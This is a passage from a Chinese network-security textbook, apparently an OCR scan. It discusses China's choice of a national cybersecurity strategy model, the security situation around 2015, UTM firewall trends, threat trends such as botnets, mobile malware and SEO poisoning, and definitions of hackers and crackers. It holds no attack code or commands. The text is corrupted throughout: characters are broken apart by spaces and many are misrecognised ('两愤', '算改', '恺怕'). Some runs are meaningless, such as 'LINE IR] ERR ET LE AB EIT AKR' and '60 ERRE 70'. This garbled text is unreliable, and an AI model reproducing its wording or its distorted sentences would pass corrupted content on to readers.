持 。 由 于 各 国文 化 背景 及 面临 的 网 络 安全 形势 ,任务 不 尽 相 同 , 网 络 安全 国家 战略 的 各 项 结 
构 要 素 在 不 同 国家 网 络 安全 战略 中 的 表现 也 不 完全 一 致 , 既 相 互 区 别 , 更 紧密 联系 ,共同 构 
成 了 一 国 网 络 安全 战略 的 整体 。 

5. 我 国 网 络 安 全 国家 战略 的 模式 选择 

2014 年 2 月 27 日 ,习近平 总 书记 在 中 央 网 络 安全 和 信息 化 领导 小 组 第 一 次 会 议 讲话 
中 指出 :“ 网 络 安全 和 信息 化 对 一 个 国家 很 多 领域 都 是 牵 一 发 而 动 全 身 的 ,要 认 清 我 们 面临 
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的 形势 和 任务 ,充分 认识 做 好 工作 的 重要 性 和 紧迫 性 , 因 势 而 谋 ,应 势 而 动 ,顺势 而 为 。 网 络 
安全 和 信息 化 是 一 体 之 两 愤 、 驱 动 之 双 轮 ,必须 统一 谋划 、 统 一 部 署 、 统 一 推进 、 统 一 实施 .” 
“没有 网 络 安全 就 没有 国家 安全 ,没有 信息 化 就 没有 现代 化 .” 这 些 重要 论述 为 选择 适合 我 国 
实际 的 网 络 安全 发 展 道路 指明 了 方向 ,无 疑 将 成 为 制定 我 国 网 络 安全 国家 战略 的 重要 依据 
和 遵循 。 在 讨论 我 国 网 络 安全 国家 战略 模式 以 及 进行 具体 设计 之 前 ,应 科学 、 准 确 地 认识 我 
国 网 络 安全 保障 体系 建设 与 发 展 的 内 部 条 件 , 既 要 科学 看 待 存在 的 差距 和 不 足 ,避免 言 目 自 
信人、 盲目 乐观 ,又 要 准确 定位 自身 优势 ,避免 民族 虚无 主义 ,一 味 崇 洋 。 

1) 我 国 的 优势 

我 国 在 网 络 安全 保障 体系 建设 方面 的 优势 ,有 以 下 3 个 方面 。 一 是 体制 优势 。 我 国 的 
社会 主义 国家 性 质 和 中 央 集 权 的 国家 体制 特征 ,使 党 和 国家 有 较 强 的 社会 动员 能 力 , 更 加 有 
利于 加 强 网 络 安全 领域 的 统筹 协调 和 资源 调度 .更 加 有 利于 团结 全 社会 的 力量 共同 应 对 网 
络 安全 问题 。 公 有 制 经 济 的 主体 地 位 也 使 得 国家 能 够 在 一 定时 期 集中 优势 资源 攻坚 克 难 ， 
更 加 有 利于 在 较 短 的 时 间 内 形成 规模 和 取得 效益 。 国 家 基础 信息 网 络 和 重要 信息 系统 为 国 
有 ,运营 机 构 为 国有 大 中 型 企业 ,政府 有 更 直接 、 更 便捷 的 渠道 与 企业 交换 网 络 安全 方面 的 
情报 信息 。 二 是 经 济 优势 。 改 革 开 放 以 来 ,我 国 经 济 社会 发 展 取得 历史 性 成 就 ,经 济 总 量 路 
居 世 界 第 二 位 ,社会 生产 力 ,经 济 实力 .科技 实力 、 人 民生 活水 平 、 居 民 收 入 水 平 .社会 保障 水 
平 ,综合 国力 、 国 际 竞争 力 、 国 际 影响 力 迈 上 一 个 大 台阶 ,特别 是 有 效应 对 了 2008 年 以 来 国 
际 金融 危机 等 外 部 经 济 风 险 冲击 ,保持 了 经 济 平稳 较 快 发 展 。 国 家 经 济 实力 ,综合 国力 的 提 
升 ,社会 财富 的 增加 ,都 使 我 国 更 有 能 力 和 底气 在 网 络 安全 这 个 需要 “ 烧 钱 ”的 领域 进行 大 规 
模 、 持 续 性 投入 。 三 是 后 发 优势 。 经 过 多 年 的 发 展 , 我 国 已 具备 了 实现 国家 网 络 安全 战略 目 
标 所 需要 的 专业 技术 和 专业 人 才 , 一 些 大 型 科研 机 构 和 军队 掌握 着 许多 世界 级 技术 ,在 网 络 
信息 技术 领域 也 已 培育 出 一 批 具 有 一 定 国际 竞争 力 的 企业 。 西 方 发 达 国 家 在 网 络 安全 战略 
发 展 方面 已 经 有 许多 实践 经 验 可 以 学 习 借 鉴 , 全 球 化 ,网络 和 信息 化 的 飞速 发 展 为 我 国 在 网 
络 安全 领域 借鉴 世界 先进 成 果 、 避 免 或 少 走 弯路 直至 迎头 赶 上 都 创造 了 良好 的 环境 条 件 。 

2) 模式 选择 

从 网 络 安全 国家 战略 基本 模式 分 析 , 在 “主导 型 "模式 “跟随 型 "模式 与 “自主 型 "模式 之 
间 , 我 国 的 战略 模式 选择 与 定位 应 是 十 分 清晰 的 。 首 先 ,“ 主 导 型 "模式 需要 以 强大 的 网 络 信 
息 技 术 实力 与 安全 优势 为 前 提 , 需 要 在 国际 网 络 安全 领域 拥有 足够 的 话语 权 ,我 国 尚 不 具备 
这 样 的 优势 和 条 件 。 其 次 ,跟随 型 ”模式 虽然 便于 我 国 在 网 络 安全 领域 的 政策 与 国际 接轨 ， 
可 为 我 国 网 络 安全 建设 节约 成 本 ,但 在 网 络 安全 战略 理念 与 价值 追求 方面 跟随 “主导 型 " 国 
家 ,并 不 符合 我 国 的 国家 利益 ,长 远 看 也 将 难以 真正 获得 安全 。 由 此 可 见 , 采 取 “ 自 主 型 " 战 
略 模式 , 走 一 条 符合 中 国 实际 的 网 络 安全 道路 ,是 制定 我 国 网 络 安全 国家 战略 的 必然 选择 ， 
也 是 实现 习近平 总 书记 在 中 央 网 络 安全 和 信息 化 领导 小 组 第 一 次 会 议 上 提出 的 “建设 网 络 
强国 ”奋斗 目标 的 必然 选择 。 同 时 也 必须 清醒 地 认识 到 ,强调 “自主 ”并 不 是 闭关 锁国 、 闭 门 
造 车 ,也 不 是 在 网 络 安全 建设 各 方面 另 搞 一 套 ,我们 采取 的 “自主 型 "战略 模式 应 是 一 种 开放 
的 ,包容 的 “自主 ”, 既 勇于 学 习 借鉴 国际 网 络 安全 建设 的 先进 经 验 , 特 别 是 先进 的 理念 .技术 
和 管理 方法 ,又 着 眼 于 我 国 实际 ,以 我 为 主 , 在 网 络 安 全 理念 阐释 、 技 术 发 展 和 管理 方式 等 方 
面 做 出 符合 我 国 国家 利益 和 发 展 阶段 的 选择 。 在 “防御 型 "战略 模式 和 “进攻 型 "战略 模式 之 
间 , 从 国家 定位 和 国家 安全 理念 等 方面 考量 ,“ 进 攻 型 "战略 模式 显然 不 符合 我 国 “和 平 发 展 ” 
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的 国家 发 展 定位 和 国家 安全 理念 ,至 少 在 现 阶段 也 不 符合 我 国 的 国家 利益 。 但 从 国际 网 络 
安全 总 体态 势 和 各 国 网 络 安全 建设 的 发 展 趋势 看 ,单纯 的 “防御 型 "战略 模式 也 很 难 适应 我 
国 在 网 络 空 间 领 域 日 益 增长 的 国家 利益 需求 。 特 别 是 在 斯 诺 登 曝光 美国 大 规模 网 络 监控 活 
动 和 美 、 英 日 等 国 高 度 重视 发 展 网 络 进攻 能 力 , 以 及 世界 范围 内 的 网 络 军备 竞赛 逐步 升级 
的 背景 下 ,如果 仅 将 我 国 的 网 络 安全 国家 战略 定位 于 "防御 ”, 恺 怕 不 仅 很 难 实现 “防御 ”的 目 
标 ,也 将 贻误 发 展 时 机 ,使 我 国 在 网 络 空间 战略 博弈 和 国家 安全 保障 方面 陷入 被 动 。 因 此 ， 
当前 我 国 网 络 安全 国家 战略 模式 选择 应 在 总 体 定 位 于 “防御 型 ”的 基础 上 ,更 加 强调 主动 的 、 
积极 的 防御 , 既 在 一 定 程度 上 和 范围 内 发 展 , 保 有 网 络 空间 的 战略 威慑 能 力 ,同时 又 通过 网 
络 安全 领域 的 国际 合作 以 及 主动 在 网 络 安全 国际 规则 制定 中 发 挥 影响 力 , 最 大 限度 地 节约 
资源 ,避免 陷入 网 络 军备 竞赛 和 国 与 国之 间 “ 安 全 困境 ”的 陷阱 。 国 家 战略 的 制定 和 决策 过 
程 既是 一 门 艺术 ,更 是 一 门 科学 。 现 代 国 家 越 来 越 重视 国家 治理 体系 的 科学 化 、 民 主 化 程度 
和 国家 治理 能 力 的 强 弱 与 效能 。 制 定 网 络 安全 国家 战略 ,决策 者 需要 更 广泛 地 听取 社会 各 
方 意见 ,在 全 面 审视 分 析 国际 国内 战略 环境 ,认真 评估 纷繁 复杂 的 战略 因素 ,力求 在 网 络 安 
全 国家 战略 目标 、 方 针 原则 .行动 举措 和 保障 措施 等 方面 寻求 平衡 。 网 络 安全 国家 战略 的 制 
定 实施 ,将 对 维护 我 国 网 络 安全 ,进而 对 实现 我 国 国家 安全 和 国家 发 展 目标 发 挥 全 局 性 、 战 
略 性 的 指导 作用 ,并 将 在 施行 中 经 受 检验 ,不 断 进 行 评估 和 修正 改进 。 


1.1.2 网 络 安全 现状 及 发 展 


网 络 安全 是 指 网 络 系统 的 软件 、 硬 件 及 其 存储 的 数据 处 于 保护 状态 ,网 络 系统 不 会 由 于 
偶然 的 或 者 恶意 的 冲击 而 受 破坏 ,网 络 系统 能 够 连续 可 靠 地 和 运行。 网络 安全 是 一 门 涉及 计 
算 机 科学 、 网 络 技术 、` 通 信 技 术 、 密 码 技术 、 信 息 安全 技术 ,应 用 数学 .信息论 等 多 研究 领域 的 
综合 性 学 科 。 概 括 地 说 ,凡是 涉及 网 络 系统 的 保密 性 、 完 整 性 、 可 用 性 和 可 控 性 的 相关 技术 
和 理论 都 是 网 络 安全 的 研究 内 容 。 

1. 网 络 安全 问题 

随 着 计算 机 技术 和 互联 网 技术 的 飞速 发 展 ,数字 化 信息 已 经 成 为 社会 发 展 的 重要 保证 。 
例如 ,数字 化 城市 .数字 化 国防 的 建设 都 需要 大 量 网 络 信 息 支 持 。 快 速 发 展 的 各 类 网 络 将 这 
些 数字 信息 紧密 地 联系 在 一 起 ,与 之 相伴 的 是 随时 可 能 发 生 的 各 类 安全 问题 。 

。 人 为 安全 问题 : 信息 泄露 .信息 窃取 、 数 据 算 改 .计算 机 病毒 。 

。 设备 安全 问题 : 自然 灾害 .设计 缺陷 .电磁 辐射 。 

2016 年 6 月 ,国家 计算 机 网 络 应 急 技术 处 理 协 调 中 心 发 布 了 (2015 年 中 国 互联 网 网 络 
安全 报告 》, 对 我 国 目前 的 网 络 安全 状况 进行 了 总 体 分 析 ,总 体 状 况 概括 为 

。 基础 通信 网 络 安全 防护 水 平 进一步 提升 。 

我 国 域名 系统 抗拒 绝 服务 攻击 能 力 显著 提升 。 

工业 互联 网 面临 的 网 络 安全 威胁 加 剧 。 

针对 我 国 重要 信息 系统 的 高 强度 有 组 织 攻 击 威 胁 形势 严峻 。 

我 国境 内 木马 和 僵尸 网 络 控制 端 数 量 下 降 , 首 次 出 现 境外 木马 和 僵尸 网 络 控 制 端 数 

量 多 于 国内 的 现象 。 

个 人 信息 泄露 事件 频繁 发 生 , 个 人 信息 泄露 引发 网 络 诈骗 和 勒索 等 “后 遗 症 ”。 

移动 互联 网 恶意 程序 数量 大 幅 增长 ,大 量 移动 恶意 程序 的 传播 渠道 转移 到 网 盘 或 广 
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告 平 台 等 网 站 ,应 用 软件 供应 链接 安全 问题 凸显 。 

。 DDoS 攻击 仍然 是 我 国 互联 网 面临 的 严重 安全 威胁 之 一 。 

。 网 络 安全 高 危 漏 洞 频 现 ,网 络 设备 安 全 漏洞 风险 依然 较 大 ,涉及 重要 行业 和 政府 部 
门 的 高 危 漏洞 事件 持续 增多 ,修复 进度 未 跟 上 步伐 ,智能 联网 设备 暴露 出 的 安全 漏 
洞 问题 严重 。 

。 网 页 仿冒 和 网 页 算 改 事件 暴涨 , 植 和 人 上 暗 链 是 网 页 自 改 的 主要 攻击 方式 。 

2. 网 络 安全 技术 

网 络 安全 技术 主要 包括 防火 墙 技 术 、 入 侵 检测 技术 以 及 防 病毒 技术 。 这 3 种 网 络 安全 
技术 还 是 针对 数据 、 单 一 系统 以 及 软 硬 件 本 身 的 安全 保障 。 

首先 ,从 用 户 角 度 看 ,虽然 安装 了 防火 墙 ,但 是 仍 避 免不了 蠕虫 .垃圾 邮件 、 病 毒 以 及 拒 
绝 服务 攻击 等 网 络 危 害 事件 的 发 生 。 

其 次 ,入侵 检测 产品 在 提前 预警 方面 存在 不 足 , 对 于 危害 程序 和 代码 的 精确 定位 以 及 系 
统 全 局 管理 能 力 还 有 很 大 的 提升 空间 。 

最 后 ,虽然 很 多 用 户 在 系统 终端 上 都 安装 了 防 病毒 产品 ,但 是 内 网 安全 问题 仍然 突出 ， 
尤其 是 安全 策略 的 执行 、 外 来 非法 侵入 、 补 丁 管理 以 及 操作 行为 制定 等 方面 。 

目前 来 看 ,网 络 安全 的 防护 重点 集中 在 信息 语义 范畴 和 网 络 行为 方面 。 

3. 网 络 安全 发 展 趋势 

在 网 络 混合 攻击 时 代 , 功 能 单一 的 防火 墙 系统 无 法 满足 业务 的 需要 ,防火墙 技术 必须 具 
备 多 种 安全 功能 ,如 基于 应 用 协议 层 防御 、 低 误 报 率 检测 .高 可 靠 高 性 能 平台 和 统一 组 件 化 
管理 技术 等 ,由 此 ,统一 威胁 管理 (Unified Threat Management,UTM) 技 术 应 运 而 生 。 

UTM 在 统一 的 产品 管理 平台 下 , 集 防火 墙 \ 虚 拟 专用 网 (VPN)、 网 关 防 病毒 、 入 侵 防 御 
系统 (IPS) ,拒绝 服务 攻击 等 众多 产品 功能 于 一 体 ,实现 了 多 种 防御 功能 ,向 UTM 方向 演进 
将 是 防火 墙 的 发 展 趋势 。 

UTM 设备 应 具备 以 下 特点 。 

CD 网 络 安全 协议 层 防御 。 主 要 针对 IP 地 址 、 端 口 等 静态 信息 进行 防护 和 控制 ,除了 
传统 的 访问 控制 外 ,还 需 对 垃圾 邮件 .拒绝 服务 .黑客 攻击 等 外 部 威胁 进行 综合 检测 和 主动 
防御 。 

(2) 通过 分 类 检测 技术 降低 误 报 率 。 串 联接 入 的 网 关 设备 一 旦 误 报 过 高 ,将 会 严重 影 
响 系统 的 正常 服务 ,给 用 户 带 来 灾难 性 的 后 果 。IPS 的 理念 在 20 世纪 90 年 代 就 被 提出 ,但 
是 目前 IPS 部 署 非常 有 限 , 影 响 其 部 署 的 一 个 重要 问题 是 误 报 率 过 高 。 分 类 检测 技术 可 以 
大 幅度 降低 误 报 率 , 针 对 不 同 的 攻击 类 型 ,采取 不 同 的 检测 技术 ,如 防御 拒绝 服务 攻击 n y 
虫 和 黑客 攻击 、. 防 垃圾 邮件 攻击 等 ,从 而 显著 降低 误 报 率 。 

G) 高 可 靠 性 、 高 性 能 的 硬件 支撑 平台 。 

OD 一 体 化 管理 。UTM 设备 具有 人 能够 统一 控制 和 管理 的 平台 ,使 用 户 能 够 有 效 地 管 
理 。 设 备 平台 可 以 实现 标准 化 并 具有 可 扩展 性 ,用 户 可 在 统一 的 平台 上 进行 组 件 管理 , 同 
时 ,一 体 化 管理 也 能 消除 信息 产品 之 间 由 于 无 法 沟通 而 带 来 的 信息 孤岛 ,从 而 在 应 对 各 种 各 
样 攻击 威胁 的 时 候 , 更 好 地 保障 用 户 的 网 络 安全 。 

4. 网 络 威胁 趋势 分 析 

在 信息 网 络 普及 的 时 代 , 信 息 安全 威胁 随时 存在 , 且 不 断 增加 ,信息 网 络 安全 性 正 逐 步 
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得 到 人 们 的 重视 。 在 当前 复杂 的 网 络 应 用 环境 下 ,信息 网 络 面临 的 安全 形势 异常 严峻 。 来 
自 中 国电 子 商 务 研 究 中 心 的 报告 列举 了 如 下 严重 的 网 络 威胁 。 

) 垃圾 邮件 和 网 络 欺骗 

社交 网 站 成 为 网 络 安全 的 重 灾区 。2010 年 ,Koobface 蠕虫 等 安全 问题 对 社交 网 站 用 户 
形成 巨大 威胁 。 从 这 些 软件 攻击 过 程 看 , 正 逐 步 由 攻击 系统 、 窃 取 资 料 的 被 动 方 式 转变 为 主 
动 攻击 模式 。 安 全 专家 认为 ,恶意 软件 作者 正在 拓展 攻击 范围 ,把 恶意 软件 植 入 社交 网 站 应 
用 层 内 部 ,攻击 者 可 以 毫 无 限制 地 窃取 用 户 的 资料 和 登录 密码 。 

思科 在 其 2009 年 (年 度 安全 报告 ) 中 揭示 了 社交 媒体 (尤其 是 社交 网 络 ) 对 网 络 安全 的 
影响 ,并 探讨 了 个 体 本 身 在 为 网 络 犯罪 创造 机 会 方面 所 起 的 关键 作用 。 社 交 网 络 已 经 成 为 
网 络 犯罪 的 导 火 索 ,网 站 成 员 过 于 信任 社区 伙伴 ,根本 没有 采取 任何 阻止 恶意 软件 和 计算 机 
病毒 的 预防 措施 。 这 些 不 良 用 户 行为 以 及 系统 、 操 作 漏洞 结合 在 一 起 会 具有 不 可 估量 的 破 
坏 性 ,将 大 幅 增加 网 络 安全 风险 。 

2015 年 ,我 国 发 生 多 起 危害 严重 的 个 人 信息 泄露 事件 ,如 某 应 用 商店 用 户 信息 泄露 事 
件 、 约 10 万 条 应 届 高 考 考生 信息 泄露 事件 ,酒店 人 住 信 息 泄 露 事件 . 某 票务 系统 近 600 个 用 
户 信 息 泄露 事件 等 。 此 外 ,个 人 信息 泄露 事件 频繁 被 媒体 报道 ,反映 出 社会 对 此 类 问题 的 关 
注 度 不 断 提 高 。 

2) 云 计算 为 网 络 犯罪 提供 了 新 的 技术 

云 计算 在 2009 年 取得 了 长 足 的 发 展 ,但 市 场 的 快速 发 展会 牺牲 一 定 的 安全 性 ,攻击 者 
今后 将 把 更 多 的 时 间 用 于 挖掘 云 计 算 服 务 提供 商 的 API( 应 用 编程 接口 ) 漏 洞 方面 。 

随 着 越 来 越 多 的 IT 功能 通过 云 计 算 提供 服务 ,网 络 犯罪 也 利用 了 这 一 趋势 。 网 络 攻 
击 者 和 黑客 也 将 效仿 企业 做 法 使 用 基于 云 计算 的 工具 ,以 便 更 有 效率 地 部 署 远 程 攻击 ,甚至 
借 此 大 幅 拓 展 攻击 范围 。 

云 提 供 了 许多 工具 ,可 以 帮助 黑客 ,特别 是 那些 用 偷 来 的 信用 卡 和 假 的 IP 地 址 获取 资 
源 使 用 的 黑客 ,他 们 的 活动 难以 追查 。 正 如 《计算 机 世界 》 中 的 文章 4 云 中 的 密码 破解 ?指出 
的 那样 ,黑客 可 以 利用 基于 云 的 计算 资源 ,例如 ,破解 密码 ,这 是 一 个 强力 的 技术 ,破解 一 个 
中 等 长 度 和 中 等 复杂 程度 的 密码 ,都 需要 很 长 的 时 间 和 大 量 的 计算 资源 。 文 章 指出 了 当 破 
解密 码 时 僵尸 网 络 和 云 的 关系 :“ 对 于 一 个 黑客 来 说 ,可 用 于 需要 的 计算 的 资源 有 两 大 来 
源 : 一 个 是 消费 者 个 人 计算 机 组 成 的 僵尸 网 络 ; 一 个 是 由 服务 提供 商 提供 的 “基础 设施 作为 
一 种 服务 (IaaS) ”的 云 。 任 何 一 个 都 能 够 提供 强大 的 计算 能 力 ,都 可 满足 专用 的 计算 需求 ”。 
对 于 云 计算 将 被 黑客 利用 这 个 严峻 的 问题 ,各 大 安全 公司 都 把 精力 放 在 与 云 计算 相关 的 安 
全 服务 上 ,提供 加 密 、 目 录 管 理 ` 反 垃圾 邮件 、 亚 意 程序 扫描 等 各 类 解决 方案 。 据 悉 ,著名 安 
全 评测 机 构 VB100 号 召 安全 行业 联合 起 来 ,组 成 一 个 对 抗 恶 意 程序 的 共同 体 ,分 享 技术 和 
资源 。 

D 智能 手机 安全 问题 愈 发 严重 

随 着 移动 应 用 的 不 断 增多 ,智能 设备 的 受 攻击 范围 也 在 不 断 扩大 ,移动 安全 面临 的 问题 
将 会 越 来 越 严 重 。 目 前 已 经 出 现 了 手机 蠕虫 病毒 .智能 手机 盗号 木马 ,虽然 这 些 病毒 还 不 能 
自我 传播 ,还 需要 依靠 计算 机 传播 ,但 是 可 以 预计 到 ,具有 自我 传播 能 力 的 病毒 势必 出 现 , 将 
严重 威胁 各 类 移动 终端 设备 。 针 对 安 卓 平 台 的 窃取 用 户 短信 、 通 讯 录 、 微 信 聊 天 记录 等 信息 
的 恶意 程序 爆发 。 安 卓 平台 感染 此 类 恶意 程序 后 ,大 量 涉及 个 人 隐私 的 信息 通过 邮件 发 送 

«Qe 


到 指定 邮箱 。 

总 体 而 言 ,安全 专家 认为 , 随 着 智能 手机 业务 范围 的 拓 广 ,用 户 利 用 手机 处 理 银行 交易 、 
社交 网 站 和 其 他 业务 ,黑客 将 越 来 越 关 注 这 一 攻击 领域 。 

D 搜索 引擎 成 为 黑客 的 全 新 赢利 方式 

黑客 不 断 寻找 新 的 方法 借助 钓鱼 网 站 吸引 用 户 , 利 用 搜索 引擎 优化 技术 展开 攻击 便 是 
其 中 的 一 种 方法 。 谷 歌 和 必 应 (Bing) 对 实时 搜索 的 支持 也 将 吸引 黑客 进一步 提升 相关 技 
术 。 作 为 一 种 攻击 渠道 ,搜索 引擎 是 非常 理想 的 选择 ,因为 用 户 通常 都 非常 信任 搜索 引擎 ， 
对 于 排 在 前 几 位 的 搜索 结果 ,更 是 没有 任何 怀疑 ,这 就 给 了 黑客 可 乘 之 机 ,从 而 对 用 户 发 动 
攻击 


5)“ 僵 尸 网 络 ?继续 猩 狐 
所 谓 僵尸 ,是 指 受 恶意 软件 感染 而 被 犯罪 分 子 远 程 操控 的 个 人 计算 机 。 犯 罪 分 子 通过 
网 络 将 病毒 植 人 成 千 上 万 台 个 人 计算 机 ,实现 大 范围 的 操控 ,犯罪 分 子 们 使 用 这 些 计算 机 进 
行 各 种 网 络 犯罪 ,如 垃圾 邮件 发 送 、 服 务 阻 断 攻击 、 网 络 钓鱼 及 非法 主机 攻击 等 ,基本 覆盖 了 
所 有 网 络 犯罪 行为 。 从 当前 的 网 络 安全 态势 看 , 越 来 越 多 的 计算 机 都 受到 感染 ,被 感染 的 时 
间 也 越 来 越 长 了 。 

2015 年 12 月 2 日 ,全 国 各 执法 机 构 在 微软 安全 研究 人 员 的 协助 下 ,成 功 摧毁 由 恶意 软 
TF Win32/Dorkbot 组 成 的 大 型 僵尸 网 络 。 该 僵尸 网 络 的 影响 非常 广 ,已 经 感染 190 多 个 国 
家 的 100 多 万 台 个 人 计算 机 。Dorkbot 主要 通过 USB 闪存 .即时 通信 软件 和 社交 网 络 进行 
传播 。 它 不 仅 盗 取 用 户 赁 证 和 个 人 信息 ,关闭 安全 保护 软件 ,而 且 还 会 传播 其 他 的 多 种 流行 
恶意 软件 ,影响 非常 恶劣 。 

6) 传统 攻击 方式 再 度 兴起 

IBM X-Force 团队 预计 ,大 规模 蠕虫 攻击 将 再 度 兴起 ,与 此 同时 ,DDoS( 分 布 式 拒绝 服 
务 攻击 ) 也 将 重新 成 为 主流 攻击 方式 ,木马 仍 将 占据 主要 地 位 。 

来 自 中 国电 子 商务 研究 中 心 的 报告 显示 , 据 Websense 的 卢 纳 德 预 计 , 电 子 邮 件 攻 击 也 
有 重新 抬头 之 势 。 研 究 人 员 已 经 发 现 ,通过 PDF 等 邮件 附件 发 动 的 攻击 开始 增加 。 他 说 : 
“恶意 邮件 攻击 在 2005 年 至 2008 年 期 间 已 经 销声匿迹 。 而 现在 不 知 出 于 何 种 原因 ,这 种 攻 
击 方式 又 再度 出 现 。” 根 据 中 国 互联 网 协会 组 织 2014 年 第 四 季度 中 国 反 垃圾 邮件 状况 调查 
报告 显示 ,用 户 电 子 邮 箱 平均 每 周 接收 到 的 全 部 邮件 数量 为 35.0 封 ,其 中 平均 每 周 接收 到 
的 垃圾 邮件 数量 为 14. 3 封 ,垃圾 邮件 占 比 是 41.0%。 

从 网 络 威胁 方式 看 ,威胁 方式 的 演进 主要 体现 在 如 下 3 个 方面 。 

CD. 实施 网 络 攻击 的 主体 发 生 了 变化 。 

实施 网 络 攻击 的 主要 人 群 正 由 好 奇 心 重 、 炫 炮 攻 防 能 力 的 兴趣 型 黑客 群 ,向 更 具 犯 罪 思 
想 的 营利 型 攻击 人 群 过 渡 , 针 对 终端 系统 漏洞 实施 “zero-day 攻击 ”和 利用 网 络 攻击 获取 经 
济 利益 逐步 成 为 主要 趋势 。 其 中 ,以 僵尸 网 络 .间谍 软件 为 手段 的 恶意 代码 攻击 ,以 敲诈 勒 
索 为 目的 的 分 布 式 拒绝 服务 攻击 ,以 网 络 仿冒 网址 嫁接 、 网 络 劫持 等 方式 进行 的 在 线 身 份 
窃取 等 安全 事件 持续 增多 ,而 针对 P2P、IM 等 新 型 网 络 应 用 的 安全 攻击 也 在 迅速 发 展 。 

(2) 企业 对 安全 威胁 的 认识 发 生 了 变化 。 

过 去 ,企业 信息 网 络 安全 的 防护 中 心 一 直 定 位 于 网 络 边 界 及 核心 数据 区 ,通过 部 署 各 种 
各 样 的 安全 设备 实现 安全 保障 。 但 随 着 企业 信息 边界 安全 体系 的 基本 完善 ,信息 安全 事件 
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仍然 层出不穷 。 企 业内 部 人 员 安 全 管理 不 足 LINE IR] ERR ET LE AB EIT AKR 
使 网 络 信 息 安 全 风险 变 得 更 为 严重 。 

(3) 安全 攻击 的 主要 手段 发 生 了 变化 。 

安全 攻击 的 手段 多 种 多 样 .典型 的 手段 包含 拒绝 服务 攻击 、 非 法 接 入 、IP 欺骗 、 网 络 嗅 
探 、 木 马 攻击 以 及 垃圾 邮件 等 方式 。 随 着 攻击 技术 的 发 展 ,攻击 手段 正 由 单一 攻击 模式 向 多 
种 攻击 手段 结合 的 复合 性 攻击 发 展 。 多 种 攻击 手段 的 复合 模式 带 来 的 危害 远 远 大 于 单一 模 
式 的 攻击 , 且 更 加 难以 控制 。 


1.1.3 黑客 及 黑客 入 侵 技 术 


1. 黑客 的 定义 

黑客 是 计算 机 专业 中 的 一 个 特殊 的 群体 , 随 着 计算 机 系统 被 攻击 报道 的 增多 ,黑客 越发 
成 为 业界 的 关注 焦点 。 黑 客 是 英文 Hacker 一 词 的 音译 ,是 指 计算 机 系统 的 非法 入 侵 者 。 

在 早期 麻 省 理工 学 院 的 校园 但 语 中 ,黑客 有 恶作剧 之 意 , 尤 指 手法 巧妙 、 技 术 高 明 的 恶 
作 剧 ;日 本 的 (新 黑客 词典 ) 中 对 黑客 的 定义 是 “喜欢 探索 软件 程序 奥秘 ,并 从 中 增长 个 人 才 
干 的 人 ”。 目前 ,黑客 的 准确 界定 为 :“ 以 保护 网 络 为 目的 ,具有 硬 软件 高 级 知识 ,有 能 力 通 
过 创新 的 方法 剖析 系统 的 技术 精英 ,他 们 以 侵入 为 手段 找 出 网 络 漏洞 ,进而 令 互联 网 络 趋 于 
完善 和 安全 。” 一 般 认为 ,黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 的 实验 室 中 ,他们 热衷 于 
解决 难题 。 

20 世纪 60 ERRE 70 年 代 ,“ 黑 客 " 富 于 讲义 , 专 指 那 些 独立 思考 、 奉 公 守 法 的 计算 机 爱 
好 者 ,这 些 人 智力 超群 ,对 计算 机 技术 全 身心 投入 ,在 他 们 看 来 ,黑客 活动 意味 着 对 计算 机 的 
最 大 潜力 进行 智力 上 的 自由 探索 ,为 计算 机 技术 的 发 展 做 出 巨大 贡献 。 正 是 这 些 黑客 ,倡导 
了 一 场 个 人 计算 机 革命 ,倡导 了 现行 的 计算 机 开放 式 体系 结构 。 现 在 黑客 使 用 的 入 侵 计算 
机 系统 的 基本 技巧 ,如 破解 口令 (password cracking)、 开 天 窗 (trapdoor)、 走 后 门 
(backdoor) 安放 特洛伊 木马 (trojan horse) 等 ,都 是 在 这 一 时 期 发 明 的 。 从 事 黑客 活动 的 经 
历 成 为 后 来 许多 计算 机 业 巨子 简历 上 不 可 或 缺 的 一 部 分 ,苹果 公司 创始 人 之 一 乔布斯 就 是 
一 个 典型 的 例子 。 

20 世纪 80 年 代 至 90 年 代 ,计算机 越 来 越 重要 ,大 型 数据 库 也 越 来 越 多 ,信息 越 来 越 集 
中 在 少数 人 的 手 里 。 黑 客 认为 ,信息 应 共享 ,而 不 应 被 少数 人 垄断 ,于 是 将 注意 力 转 移 到 涉 
及 各 种 机 密 的 信息 数据 库 上 。 这 时 ,电脑 化 空间 已 私有 化 ,成 为 个 人 拥有 的 财产 ,社会 不 能 
再 对 黑客 行为 放任 不 管 ,必须 采取 行动 ,利用 法 律 等 手段 进行 控制 ,黑客 活动 受到 打击 。 目 
前 ,许多 政府 机 构 已 经 邀请 黑客 为 他 们 检验 系统 的 安全 性 ,甚至 还 请 他 们 设计 新 的 安保 
规程 。 

与 黑客 相对 的 是 骇 客 , 骇 客 是 cracker 的 音译 ,就 是 “破坏 者 ”的 意思 。 骇 客 是 贬义 的 ， 
骇 客 做 的 事情 更 多 的 是 破解 商业 软件 、 恶 意 入 侵 别 人 的 网 站 并 造成 损失 ,利用 网 络 漏洞 破坏 
网 络 。 他 们 具备 广泛 的 计算 机 知识 ,但 与 黑客 不 同 的 是 ,他 们 以 破坏 为 目的 。 

黑客 和 骇 客 的 基本 差异 在 于 ,黑客 是 有 建设 性 的 ,而 骇 客 则 专门 搞 破 坏 。 对 一 个 黑客 来 
说 ,学 会 人 侵 和 破解 是 必要 的 ,但 最 主要 的 还 是 编程 。 对 于 一 个 骇 客 来 说 ,他 们 只 追求 人 侵 
的 快感 ,不 在 乎 技术 ,他们 不 会 编程 ,不 知道 入侵 的 具体 细节 。 还 有 一 种 情况 是 ,试图 破解 某 
系统 或 网 络 ,以 提醒 该 系统 所 有 者 的 系统 安全 漏洞 ,这 群 人 往往 被 称 作 * 白 帽 黑客 ”, 或 “匿名 
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JE" (sneaker) ,或 “ 红 客 ”。 许 多 这 样 的 人 是 计算 机 安全 公司 的 雇员 ,并 在 完全 合法 的 情况 下 
攻击 某 系 统 。 

2. 黑客 活动 

黑客 的 主要 活动 内 容 包 括 以 下 5 个 方面 。 

CD 作为 一 个 黑客 ,在 找到 系统 漏洞 并 侵入 的 时 候 ,往往 都 会 很 小 心地 避免 造成 损失 , 
并 且 善 意 地 提醒 系统 管理 员 ,但 是 在 这 个 过 程 中 许多 因素 都 是 未 知 的 ,没有 人 能 肯定 最 终 会 
是 什么 结果 ,因此 一 个 好 的 黑客 是 不 会 随便 攻击 个 人 用 户 及 站 点 的 。 

(2) 编写 一 些 有 用 的 开源 软件 .这些 软件 都 是 免费 的 公开 的 。 

